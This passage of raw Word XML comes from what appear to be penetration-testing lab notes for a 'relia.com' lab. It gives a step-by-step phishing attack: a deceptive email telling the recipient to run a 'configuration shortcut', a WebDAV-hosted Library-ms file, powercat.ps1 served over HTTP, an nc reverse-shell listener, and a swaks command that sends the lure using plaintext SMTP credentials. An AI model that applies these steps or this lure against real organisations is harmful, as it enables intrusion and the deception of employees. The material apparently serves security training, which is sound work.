          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT, if you don't host the webdav server on port 80, then change the port on the config.Library-ms file. If you do have it on port 80, then just delete the port 80 on the file. I haven't tested it out if it works with the port 80 on there. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put this file (and all the other files) inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/webdav</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then also create body for the email inside of file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> body.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inside of webdav directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D7">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hey!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D8">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D9">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DA">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DC">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure body.txt, the shortcut, and config.Library-ms are all inside of /home/kali/webdav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the powercat.ps1 file on port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener for rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run swaks, which sends the mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo swaks -t </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jim@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">maildmz@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --attach </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@config.Library-ms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.158.189</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --body </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@body.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--header "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subject: test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" --suppress-data -ap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: this is the receiver of mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : this is who is sending the mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.158.189 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the machine with the all the mailing ports. It's the target machine of the attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--suppress-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to summarize information regarding the SMTP transactions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enable password authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will ask for username and password. This is used for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logging into SMTP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: maildmz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password: DPuBT9tGCBrTb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These creds must be allowed to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">send mail via the target SMTP server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output should look something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4306908" cy="3927293"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="477" name="image458.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image458.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId812"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4306908" cy="3927293"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Plus you should look at your powercat listener and see if the target machine tried download it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then wait for like 30 seconds on listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tgpk2rx7x4sh" w:id="343"/>
      <w:bookmarkEnd w:id="343"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prerequisites for this phishing attack</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports Required (Essential)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You sent the phishing email using the tool swaks, which requires access to an SMTP server that accepts authentication and allows you to send as the compromised user (maildmz@relia.com).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If AUTH LOGIN isn’t there you can still do the attack as long as the server accepts mail without authentication which many do for inbound mail to their domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F8">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F9">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since you didn't specify port in Swaks, it likely defaulted to port 25 which had AUTH LOGIN so that meant you can login using username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FA">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FB">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
